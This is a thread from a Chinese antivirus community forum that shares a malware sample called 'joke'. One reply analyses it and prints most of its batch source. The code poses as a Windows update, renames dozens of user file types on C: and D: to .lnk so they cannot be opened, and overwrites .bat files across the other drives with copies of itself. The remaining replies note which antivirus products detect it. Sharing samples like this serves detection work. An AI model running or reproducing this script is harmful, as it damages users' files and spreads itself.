查看: 1957|回复: 7
收起左侧

[病毒样本] joke

[复制链接]
username
发表于 2010-3-26 16:04:52 | 显示全部楼层 |阅读模式

pw:qwert
jason_jiang
发表于 2010-3-26 16:11:49 | 显示全部楼层
本帖最后由 jason_jiang 于 2010-3-26 16:42 编辑

貌似是个BAT开头加了FF FE伪装成UTF-16 little endian编码
代码太长贴不下,故去除cls命令
  1. @echo off
  2. if exist test.log goto start
  3. echo 1 > test.log
  4. start /min test.bat
  5. exit
  6. :start
  7. title Windows自动更新中...请勿关闭...
  8. del test.log
  9. for /F "tokens=*" %%i in ('dir c:\*.txt /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  10. for /F "tokens=*" %%i in ('dir c:\*.c /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  11. for /F "tokens=*" %%i in ('dir c:\*.pas /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  12. for /F "tokens=*" %%i in ('dir c:\*.cs /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  13. for /F "tokens=*" %%i in ('dir c:\*.asm /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  14. for /F "tokens=*" %%i in ('dir c:\*.ahk /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  15. for /F "tokens=*" %%i in ('dir c:\*.au2 /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  16. for /F "tokens=*" %%i in ('dir c:\*.dwg /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  17. for /F "tokens=*" %%i in ('dir c:\*.rmvb /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  18. for /F "tokens=*" %%i in ('dir c:\*.avi /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  19. for /F "tokens=*" %%i in ('dir c:\*.mkv /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  20. for /F "tokens=*" %%i in ('dir c:\*.mp4 /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  21. for /F "tokens=*" %%i in ('dir c:\*.mpg /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  22. for /F "tokens=*" %%i in ('dir c:\*.flv /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  23. for /F "tokens=*" %%i in ('dir c:\*.fla /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  24. for /F "tokens=*" %%i in ('dir c:\*.swf /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  25. for /F "tokens=*" %%i in ('dir c:\*.mp3 /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  26. for /F "tokens=*" %%i in ('dir c:\*.wma /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  27. for /F "tokens=*" %%i in ('dir c:\*.wav /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  28. for /F "tokens=*" %%i in ('dir c:\*.midi /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  29. for /F "tokens=*" %%i in ('dir c:\*.tta /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  30. for /F "tokens=*" %%i in ('dir c:\*.ape /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  31. for /F "tokens=*" %%i in ('dir c:\*.flac /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  32. for /F "tokens=*" %%i in ('dir c:\*.rar /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  33. for /F "tokens=*" %%i in ('dir c:\*.zip /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  34. for /F "tokens=*" %%i in ('dir c:\*.gz /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  35. for /F "tokens=*" %%i in ('dir c:\*.flac /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  36. for /F "tokens=*" %%i in ('dir c:\*.bmp /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  37. for /F "tokens=*" %%i in ('dir c:\*.png /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  38. for /F "tokens=*" %%i in ('dir c:\*.jpg /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  39. for /F "tokens=*" %%i in ('dir c:\*.jpeg /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  40. for /F "tokens=*" %%i in ('dir c:\*.psd /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  41. for /F "tokens=*" %%i in ('dir c:\*.gif /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  42. for /F "tokens=*" %%i in ('dir c:\*.doc /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  43. for /F "tokens=*" %%i in ('dir c:\*.xls /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  44. for /F "tokens=*" %%i in ('dir c:\*.ppt /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  45. for /F "tokens=*" %%i in ('dir c:\*.docx /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  46. for /F "tokens=*" %%i in ('dir c:\*.iso /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  47. for /F "tokens=*" %%i in ('dir c:\*.mdf /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  48. for /F "tokens=*" %%i in ('dir c:\*.mds /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  49. for /F "tokens=*" %%i in ('dir c:\*.nrg /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  50. for /F "tokens=*" %%i in ('dir c:\*.lib /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  51. for /F "tokens=*" %%i in ('dir c:\*.inc /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  52. for /F "tokens=*" %%i in ('dir c:\*.mpc /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  53. for /F "tokens=*" %%i in ('dir c:\*.ico /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  54. for /F "tokens=*" %%i in ('dir c:\*.h /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  55. for /F "tokens=*" %%i in ('dir c:\*.asp /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  56. for /F "tokens=*" %%i in ('dir d:\*.htm /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  57. for /F "tokens=*" %%i in ('dir d:\*.php /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  58. for /F "tokens=*" %%i in ('dir d:\*.html /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  59. for /F "tokens=*" %%i in ('dir d:\*.txt /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  60. for /F "tokens=*" %%i in ('dir d:\*.c /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  61. for /F "tokens=*" %%i in ('dir d:\*.pas /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  62. for /F "tokens=*" %%i in ('dir d:\*.cs /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  63. for /F "tokens=*" %%i in ('dir d:\*.asm /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  64. for /F "tokens=*" %%i in ('dir d:\*.ahk /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  65. for /F "tokens=*" %%i in ('dir d:\*.au2 /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  66. for /F "tokens=*" %%i in ('dir d:\*.dwg /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  67. for /F "tokens=*" %%i in ('dir d:\*.rmvb /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  68. for /F "tokens=*" %%i in ('dir d:\*.avi /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  69. for /F "tokens=*" %%i in ('dir d:\*.mkv /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  70. for /F "tokens=*" %%i in ('dir d:\*.mp4 /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  71. for /F "tokens=*" %%i in ('dir d:\*.mpg /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  72. for /F "tokens=*" %%i in ('dir d:\*.flv /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  73. for /F "tokens=*" %%i in ('dir d:\*.fla /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  74. for /F "tokens=*" %%i in ('dir d:\*.swf /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  75. for /F "tokens=*" %%i in ('dir d:\*.mp3 /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  76. for /F "tokens=*" %%i in ('dir d:\*.wma /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  77. for /F "tokens=*" %%i in ('dir d:\*.wav /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  78. for /F "tokens=*" %%i in ('dir d:\*.midi /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  79. for /F "tokens=*" %%i in ('dir d:\*.tta /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  80. for /F "tokens=*" %%i in ('dir d:\*.ape /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  81. for /F "tokens=*" %%i in ('dir d:\*.flac /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  82. for /F "tokens=*" %%i in ('dir d:\*.rar /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  83. for /F "tokens=*" %%i in ('dir d:\*.zip /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  84. for /F "tokens=*" %%i in ('dir d:\*.gz /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  85. for /F "tokens=*" %%i in ('dir d:\*.flac /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  86. for /F "tokens=*" %%i in ('dir d:\*.bmp /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  87. for /F "tokens=*" %%i in ('dir d:\*.png /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  88. for /F "tokens=*" %%i in ('dir d:\*.jpg /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  89. for /F "tokens=*" %%i in ('dir d:\*.jpeg /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  90. for /F "tokens=*" %%i in ('dir d:\*.psd /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  91. for /F "tokens=*" %%i in ('dir d:\*.gif /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  92. for /F "tokens=*" %%i in ('dir d:\*.doc /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  93. for /F "tokens=*" %%i in ('dir d:\*.xls /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  94. for /F "tokens=*" %%i in ('dir d:\*.ppt /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  95. for /F "tokens=*" %%i in ('dir d:\*.docx /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  96. for /F "tokens=*" %%i in ('dir d:\*.iso /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  97. for /F "tokens=*" %%i in ('dir d:\*.mdf /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  98. for /F "tokens=*" %%i in ('dir d:\*.mds /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  99. for /F "tokens=*" %%i in ('dir d:\*.nrg /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  100. for /F "tokens=*" %%i in ('dir d:\*.lib /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  101. for /F "tokens=*" %%i in ('dir d:\*.inc /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  102. for /F "tokens=*" %%i in ('dir d:\*.mpc /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  103. for /F "tokens=*" %%i in ('dir d:\*.ico /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  104. for /F "tokens=*" %%i in ('dir d:\*.h /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
  105. for /F "tokens=*" %%i in ('dir d:\*.asp /A:-D /S /B') do move "%%i" "%%i.lnk"2>nul
复制代码
然后继续E、F、G直到Z盘
最后
  1. for /F "tokens=*" %%i in ('dir d:\*.bat /A:-D /S /B') do copy "%0" "%%i"2>nul
  2. for /F "tokens=*" %%i in ('dir e:\*.bat /A:-D /S /B') do copy "%0" "%%i"2>nul
  3. for /F "tokens=*" %%i in ('dir f:\*.bat /A:-D /S /B') do copy "%0" "%%i"2>nul
  4. for /F "tokens=*" %%i in ('dir g:\*.bat /A:-D /S /B') do copy "%0" "%%i"2>nul
  5. for /F "tokens=*" %%i in ('dir h:\*.bat /A:-D /S /B') do copy "%0" "%%i"2>nul
  6. for /F "tokens=*" %%i in ('dir i:\*.bat /A:-D /S /B') do copy "%0" "%%i"2>nul
  7. for /F "tokens=*" %%i in ('dir j:\*.bat /A:-D /S /B') do copy "%0" "%%i"2>nul
  8. for /F "tokens=*" %%i in ('dir x:\*.bat /A:-D /S /B') do copy "%0" "%%i"2>nul
  9. for /F "tokens=*" %%i in ('dir y:\*.bat /A:-D /S /B') do copy "%0" "%%i"2>nul
  10. for /F "tokens=*" %%i in ('dir z:\*.bat /A:-D /S /B') do copy "%0" "%%i"2>nul
复制代码
kanfaner
头像被屏蔽
发表于 2010-3-26 16:24:26 | 显示全部楼层
0.0
juhone
发表于 2010-3-26 17:19:37 | 显示全部楼层
过红伞
jayavira
发表于 2010-3-26 17:40:39 | 显示全部楼层
to eset
tshnel
发表于 2010-3-26 17:44:03 | 显示全部楼层
to 微点主防
sololp 该用户已被删除
发表于 2010-3-26 22:47:48 | 显示全部楼层
果然joke
中邪
发表于 2010-3-26 23:08:28 | 显示全部楼层
AVG miss
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-24 05:24 , Processed in 0.130634 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表